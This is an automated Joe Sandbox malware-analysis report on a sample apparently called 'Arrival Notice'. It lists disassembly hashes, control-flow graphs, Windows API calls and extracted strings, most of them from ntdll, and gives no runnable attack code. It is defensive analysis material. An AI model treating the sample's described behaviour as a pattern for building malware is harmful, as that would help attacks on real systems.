                                                                              • Instruction Fuzzy Hash: E501F77161834D9AE7114A6ACDC8767BF9CEF40324F18C52AEE8C4E1C2C6799881C6B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706380814.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_126d000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 36d993056f329206b2ddf4e47ecb4647b573f3c04ee10774c8c67a6ad1c6b006
                                                                              • Instruction ID: a32364197697380dfe8a52364fd5a608425ff58db106818a921bd10464c444d0
                                                                              • Opcode Fuzzy Hash: 36d993056f329206b2ddf4e47ecb4647b573f3c04ee10774c8c67a6ad1c6b006
                                                                              • Instruction Fuzzy Hash: 7DF0C271504348AAE7108A1ADDC8B62FFACEB40724F18C55AEE4C4F282C2799885CAB0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ff428fcaef0b5dad401c8b9b205a667dd73de6702f10b36a83a9ebf3136806d7
                                                                              • Instruction ID: 55fe1c5fb042a6cbd123dabfe5ee83cea80d82ed9b1678506a9fe8415ffbd894
                                                                              • Opcode Fuzzy Hash: ff428fcaef0b5dad401c8b9b205a667dd73de6702f10b36a83a9ebf3136806d7
                                                                              • Instruction Fuzzy Hash: D8E11874E10159DFCB14DFA9C5849AEBBF2FF89305F248169E418AB316DB34A941CFA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f448f34aaf3160ac0956347af60f4286ad65fdf1c77712071e5e69612da12e49
                                                                              • Instruction ID: bf2d16e238c67654070028e8c66921c4a4a1bd2ebf2ea4040deb79f8f924b593
                                                                              • Opcode Fuzzy Hash: f448f34aaf3160ac0956347af60f4286ad65fdf1c77712071e5e69612da12e49
                                                                              • Instruction Fuzzy Hash: C9E11674E10119CFCB54CFA9C5809AEBBB2FF89301F24D169E414AB356D730A982CF60
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a66b84d3ac7147e5fbf213ef967caf29eeaf948827b19074c845b0291ae6d2b6
                                                                              • Instruction ID: feac2f3671b636e40fc5b529de283d6dd31b4866b51fd02616577782e96dfd88
                                                                              • Opcode Fuzzy Hash: a66b84d3ac7147e5fbf213ef967caf29eeaf948827b19074c845b0291ae6d2b6
                                                                              • Instruction Fuzzy Hash: 77E1F674E10129DFCB14DFA9D5809AEFBF2FB49301F248169E418AB35AD735A942CF60
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5f8b4122d013c967f3840bf03fde9c1efb89a95bcf71635958e4a52abb3218c6
                                                                              • Instruction ID: 691a30915e6eebcd2cdadb2553ac6241f6b213082171a46c42543dc9b20c6756
                                                                              • Opcode Fuzzy Hash: 5f8b4122d013c967f3840bf03fde9c1efb89a95bcf71635958e4a52abb3218c6
                                                                              • Instruction Fuzzy Hash: ACE117B4E10159DFCB14DFA9C5849AEFBB2FF89305F248169D418AB315D734A982CF60
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ab2a2d490a9ee356c7ba71a1cb17def5f6dc1e2adef9e79d1bfe3680d0400aca
                                                                              • Instruction ID: 3c9ff07a5c8c3990b1447e36e4b696b2b782b38adeec56839a264c302bbd749f
                                                                              • Opcode Fuzzy Hash: ab2a2d490a9ee356c7ba71a1cb17def5f6dc1e2adef9e79d1bfe3680d0400aca
                                                                              • Instruction Fuzzy Hash: 1DE117B4E10159DFCB14DFA9C5809AEBBF2FF89305F248169E418AB356D730A942CF64
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 51b6d00dd620235b4aaa59cd888bd3b1d6703a4f5d90f729fe93eb23643ccf77
                                                                              • Instruction ID: 316a8b73f8792b59c3800073083f2699bd39e1d70c07d914ee1f7b4d0b8d462d
                                                                              • Opcode Fuzzy Hash: 51b6d00dd620235b4aaa59cd888bd3b1d6703a4f5d90f729fe93eb23643ccf77
                                                                              • Instruction Fuzzy Hash: 1BA17232E0021ACFCF2ADFB8C85059EBBF6FF85304B15456AE905AB2A5DB31D955CB40

                                                                              Execution Graph

                                                                              Execution Coverage:1.2%
                                                                              Dynamic/Decrypted Code Coverage:4.5%
                                                                              Signature Coverage:7.1%
                                                                              Total number of Nodes:154
                                                                              Total number of Limit Nodes:13

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 179 417933-41795c call 42e143 182 417962-417970 call 42e663 179->182 183 41795e-417961 179->183 186 417980-417991 call 42cb03 182->186 187 417972-41797d call 42e903 182->187 192 417993-4179a7 LdrLoadDll 186->192 193 4179aa-4179ad 186->193 187->186 192->193
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_400000_Arrival Notice.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 199 42b543-42b57f call 404a83 call 42c603 NtClose
                                                                              APIs
                                                                              • NtClose.NTDLL(?,0041656F,001F0001,?,00000000,?,?,00000104), ref: 0042B57A
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_400000_Arrival Notice.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 213 15b2b60-15b2b6c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 215 15b2df0-15b2dfc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 214 15b2c70-15b2c7c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 216 15b35c0-15b35cc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0

                                                                              Control-flow Graph

                                                                              control_flow_graph 0 413e00-413e02 1 413e55-413e64 0->1 2 413e04-413e0b 0->2 5 413e67-413e69 1->5 3 413dfd-413dfe 2->3 4 413e0d-413e19 2->4 3->0 4->5 6 413e1b-413e36 4->6 7 413ec4-413ee2 5->7 8 413e6a-413e76 5->8 9 413df7-413dfc 6->9 10 413e38-413e3a 6->10 14 413ee4-413ef5 7->14 15 413f29-413f31 7->15 11 413e78-413e8b 8->11 12 413e3f-413e4f 8->12 9->3 10->12 11->7 12->1 16 413f91-413fad 15->16 17 413f33-413f3a 15->17 18 413fcd-413fd3 16->18 19 413faf-413fbe PostThreadMessageW 16->19 19->18 20 413fc0-413fca 19->20 20->18
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_400000_Arrival Notice.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 66159w4$66159w4
                                                                              • API String ID: 0-1576546964

                                                                              Control-flow Graph

                                                                              control_flow_graph 21 413f3b-413f8b call 42d4e3 call 42def3 call 417933 call 4049f3 31 413f91-413fad 21->31 32 413f8c call 4247a3 21->32 33 413fcd-413fd3 31->33 34 413faf-413fbe PostThreadMessageW 31->34 32->31 34->33 35 413fc0-413fca 34->35 35->33
                                                                              APIs
                                                                              • PostThreadMessageW.USER32(66159w4,00000111,00000000,00000000), ref: 00413FBA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_400000_Arrival Notice.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID: 66159w4$66159w4
                                                                              • API String ID: 1836367815-1576546964

                                                                              Control-flow Graph

                                                                              control_flow_graph 36 413f43-413f8b call 42d4e3 call 42def3 call 417933 call 4049f3 45 413f91-413fad 36->45 46 413f8c call 4247a3 36->46 47 413fcd-413fd3 45->47 48 413faf-413fbe PostThreadMessageW 45->48 46->45 48->47 49 413fc0-413fca 48->49 49->47
                                                                              APIs
                                                                              • PostThreadMessageW.USER32(66159w4,00000111,00000000,00000000), ref: 00413FBA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_400000_Arrival Notice.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID: 66159w4$66159w4
                                                                              • API String ID: 1836367815-1576546964

                                                                              Control-flow Graph

                                                                              control_flow_graph 59 42b8b3-42b8f4 call 404a83 call 42c603 RtlFreeHeap
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B8EF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_400000_Arrival Notice.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID: fA
                                                                              • API String ID: 3298025750-3595381179

                                                                              Control-flow Graph

                                                                              control_flow_graph 194 42b863-42b8a4 call 404a83 call 42c603 RtlAllocateHeap
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(?,0041E15B,?,?,00000000,?,0041E15B,?,?,?), ref: 0042B89F
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_400000_Arrival Notice.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0

                                                                              Control-flow Graph

                                                                              control_flow_graph 204 42b903-42b93f call 404a83 call 42c603 ExitProcess
                                                                              APIs
                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,52AC804A,?,?,52AC804A), ref: 0042B93A
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_400000_Arrival Notice.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExitProcess
                                                                              • String ID:
                                                                              • API String ID: 621844428-0

                                                                              Control-flow Graph

                                                                              control_flow_graph 209 15b2c0a-15b2c0f 210 15b2c1f-15b2c26 LdrInitializeThunk 209->210 211 15b2c11-15b2c18 209->211
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-2160512332
                                                                              Strings
                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015E540A, 015E5496, 015E5519
                                                                              • corrupted critical section, xrefs: 015E54C2
                                                                              • 8, xrefs: 015E52E3
                                                                              • Critical section address., xrefs: 015E5502
                                                                              • undeleted critical section in freed memory, xrefs: 015E542B
                                                                              • Thread identifier, xrefs: 015E553A
                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015E54CE
                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 015E5543
                                                                              • Critical section address, xrefs: 015E5425, 015E54BC, 015E5534
                                                                              • Critical section debug info address, xrefs: 015E541F, 015E552E
                                                                              • Invalid debug info address of this critical section, xrefs: 015E54B6
                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015E54E2
                                                                              • double initialized or corrupted critical section, xrefs: 015E5508
                                                                              • Address of the debug info found in the active list., xrefs: 015E54AE, 015E54FA
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                              • API String ID: 0-2368682639
                                                                              Strings
                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 015E2409
                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 015E2624
                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 015E2602
                                                                              • @, xrefs: 015E259B
                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015E25EB
                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015E22E4
                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 015E2498
                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 015E2506
                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 015E261F
                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015E24C0
                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 015E2412
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                              • API String ID: 0-4009184096
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                              • API String ID: 0-2515994595
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                              • API String ID: 0-1700792311
                                                                              Strings
                                                                              • VerifierDlls, xrefs: 015F8CBD
                                                                              • VerifierFlags, xrefs: 015F8C50
                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 015F8A67
                                                                              • VerifierDebug, xrefs: 015F8CA5
                                                                              • HandleTraces, xrefs: 015F8C8F
                                                                              • AVRF: -*- final list of providers -*- , xrefs: 015F8B8F
                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 015F8A3D
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                              • API String ID: 0-3223716464
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                              • API String ID: 0-1109411897
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-792281065
                                                                              Strings
                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 015C9A01
                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015C99ED
                                                                              • LdrpInitShimEngine, xrefs: 015C99F4, 015C9A07, 015C9A30
                                                                              • apphelp.dll, xrefs: 01566496
                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 015C9A2A
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015C9A11, 015C9A3A
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-204845295
                                                                              Strings
                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015E21BF
                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 015E219F
                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 015E2180
                                                                              • SXS: %s() passed the empty activation context, xrefs: 015E2165
                                                                              • RtlGetAssemblyStorageRoot, xrefs: 015E2160, 015E219A, 015E21BA
                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 015E2178
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                              • API String ID: 0-861424205
                                                                              Strings
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 015E8181, 015E81F5
                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 015E81E5
                                                                              • LdrpInitializeImportRedirection, xrefs: 015E8177, 015E81EB
                                                                              • Loading import redirection DLL: '%wZ', xrefs: 015E8170
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015AC6C3
                                                                              • LdrpInitializeProcess, xrefs: 015AC6C4
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                              • API String ID: 0-475462383
                                                                              APIs
                                                                                • Part of subcall function 015B2DF0: LdrInitializeThunk.NTDLL ref: 015B2DFA
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B0BA3
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B0BB6
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B0D60
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B0D74
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 1404860816-0
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                              • API String ID: 0-379654539
                                                                              Strings
                                                                              • @, xrefs: 015A8591
                                                                              • LdrpInitializeProcess, xrefs: 015A8422
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015A8421
                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015A855E
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-1918872054
                                                                              Strings
                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015E21D9, 015E22B1
                                                                              • .Local, xrefs: 015A28D8
                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015E22B6
                                                                              • SXS: %s() passed the empty activation context, xrefs: 015E21DE
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                              • API String ID: 0-1239276146
                                                                              Strings
                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 015E3456
                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 015E342A
                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 015E3437
                                                                              • RtlDeactivateActivationContext, xrefs: 015E3425, 015E3432, 015E3451
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                              • API String ID: 0-1245972979
                                                                              Strings
                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 015D106B
                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 015D1028
                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 015D0FE5
                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015D10AE
                                                                              Similarity
                                                                              • API ID:
